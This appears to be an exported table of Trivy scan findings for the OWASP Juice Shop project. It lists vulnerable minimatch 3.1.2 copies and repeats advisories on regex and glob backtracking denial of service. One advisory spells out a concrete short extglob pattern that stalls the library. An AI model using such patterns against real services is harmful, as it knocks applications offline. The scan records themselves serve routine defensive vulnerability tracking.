https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.257873+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.261314+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,144,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.261370+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.261322+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.264857+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,145,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.264911+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.264865+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.268675+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,146,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.268767+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.268686+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.273545+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,147,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.273601+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.273554+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.277054+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,148,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.277107+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.277061+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.281203+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,149,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.281258+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.281211+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.285048+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,150,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.285108+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.285058+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.289779+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,151,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.289838+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.289788+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.293718+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,152,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.293781+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.293727+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.297479+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,153,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.297533+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 